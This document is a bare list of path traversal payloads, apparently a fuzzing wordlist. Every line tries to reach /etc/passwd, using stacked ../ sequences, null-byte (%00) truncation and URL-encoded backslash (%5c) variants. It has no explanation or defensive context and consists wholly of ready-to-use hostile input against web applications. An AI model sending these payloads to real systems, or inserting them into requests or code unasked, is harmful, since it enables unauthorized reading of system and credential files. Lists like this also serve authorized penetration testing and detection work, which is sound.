/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
%5cetc%5cpasswd
..%5cetc%5cpasswd
..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
%5cetc%5cpasswd%00
..%5cetc%5cpasswd%00
..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00
